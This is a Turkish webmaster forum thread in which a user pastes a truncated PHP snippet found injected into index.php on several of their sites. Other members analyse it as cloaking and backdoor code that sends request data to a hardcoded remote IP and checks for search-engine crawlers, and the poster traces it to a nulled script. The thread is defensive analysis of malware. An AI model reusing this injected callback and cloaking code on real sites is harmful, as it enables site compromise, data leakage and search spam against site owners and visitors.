Hoşgeldin Misafir

merhaba arkadaşlar bir sorum olacak

astralglikos

astralglikos

Astral Glikos
21 Ara 2017
1,317 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
şöyle bir kod yapısı çıktı kaç tane sitemde index.php de sizce bu kod yapısı neyin kod yapısıdır

?php $group_num='z0109_8';$inter_domain='http://107.150.41.2/'.$group_num.'/';function curl_get_contents($url){$ch=curl_init();curl_setopt ($ch, CURLOPT_URL, $url);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);$file_contents = curl_exec($ch);curl_close($ch);return $file_contents; }function getServerCont($url,$data=array()){$url=str_replace(' ','+',$url);$ch=curl_init();curl_setopt($ch,CURLOPT_URL,"$url");curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_TIMEOUT,10);curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt($ch,CURLOPT_POSTFIELDS,http_build_query($data));$output = curl_exec($ch);$errorCode = curl_errno($ch);curl_close($ch);if(0!== $errorCode){ return false;}return $output;}function is_crawler($agent){$agent_check=false; $bots='googlebot|google|yahoo|bing|aol';if($agent!=''){if(preg_match("/($bots)/si",$agent)){$agent_check = true; }}return $agent_check;}function check_refer($refer){ $check_refer=false;$referbots='google.co.jp|yahoo.co.jp|google.com';if($refer!='' && preg_match("/($referbots)/si",$refer)){ $check_refer=true; }return $check_refer; }$http=((isset($_SERVER['HTTPS'])&&$_SERVER['HTTPS']!=='off')?'https://':'http://');$req_uri=$_SERVER['REQUEST_URI'];$domain=$_SERVER["HTTP_HOST"];$self=$_SERVER['PHP_SELF'];$ser_name=$_SERVER['SERVER_NAME'];$req_url=$http.$domain.$req_uri;$indata1=$inter_domain."/indata.php";$map1=$inter_domain.
 

35izmir

35izmir

🆁🅴🅸🆂🅲🅸🆂🅴🆅🅴🆁
11 Ocak 2018
2,701 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Yüzme Bilmiyorsan neden çıkıyorsun erik ağacına

'http://107.150.41.2/'.$group_num.'/';function

İp yi sorgulayınca

mine.angularmodules.com a yönlerdirme yapıyor

Adres kanca görevi görüyor ve senin host bilginden tut log kayıtlarına kadar erişiyor backlink hacklink botnet yaparlar veya olası bir siber savaşta sitene girip index atarlar


Site nin adresini özelden atarmısın hangi warez içerik için bu oltaya düştün merak ediyorum
 

35izmir

35izmir

🆁🅴🅸🆂🅲🅸🆂🅴🆅🅴🆁
11 Ocak 2018
2,701 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
"getServerCont" işlevi, ekstra parametreleri kabul eden ilkinin bir varyasyonu oluyor . Bu parametrelerden biri, cURL işlevinin yürütülmesi için maksimum süreyi sınırlayan CURLOPT_TIMEOUT'tur.
Ayrıca, POST isteği için CURLOPT_POST ve CURLOPT_POSTFIELDS seçeneklerini ayarlar ve Curl çağrıları için SSL doğrulamasını devre dışı bırakır. yani istediğin kadar ssl kullan bilgileri şifrelemeden çeker alır guzum
Daha sonra iki ek işlev tanımlar: sırasıyla "is_crawler" ve "check_refer", belirli bir kullanıcı aracısı dizesinin bilinen bir arama motoru botuna ait olup olmadığını ve bir web isteğinin yönlendirenin belirli bir URL listesine ait olup olmadığını kontrol eder

Ardından komut dosyası, aşağıdakiler gibi bazı ek değişkenler ayarlar:
$http: İsteğin HTTPS üzerinden mi yoksa HTTP üzerinden mi yapıldığını kontrol eder.
$req_uri: Bu sayfaya erişmek için verilen URI'yi içerir.
$domain: Sunucunun HTTP_HOST'unu içerir.
$self: Yürütülen komut dosyasının dosya adı
$ser_name: Sunucu adı
$req_url: İsteğin URL'si
$indata1: URL, daha önce tanımlanan $inter_domain değişkeni ve "/indata.php" sabit dizisi ile oluşturulur.
$map1: URL, $inter_domain değişkeni ve başka bir sabit dize ile oluşturulur.

index.php de olması bu sonuca çıkarıyor ama kullanılan script alt yapı ya göre de değişkenlik gösterir temaya enjeksiyon güzel çakılmış gibi
 

astralglikos

astralglikos

Astral Glikos
21 Ara 2017
1,317 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Ayrı bi footer yoktur belki yada farkında olmadan eklemiştir
hangi scriptte var buldumda ama bizim insanlarımız çok acayipki neden böyle birşey yaparki yani eline ne geçiyor bir iyilik yapıyorlar onuda hevesi oğruna insanları zarara sokmaya çalışırlar bu son yazılım ajans v6 plus ta gömmüşler assets / vendor / 1hp.php ve alpa diye birşey oluşturmuşlar orda tabi kaldırdık ama dahada nereye gömmüşler bilmiyorum arıyorum didik didik ama kullananlar varsa bu dosyaları bellirttiğim klasörden silsinler bildiklerim bunlar şuanlık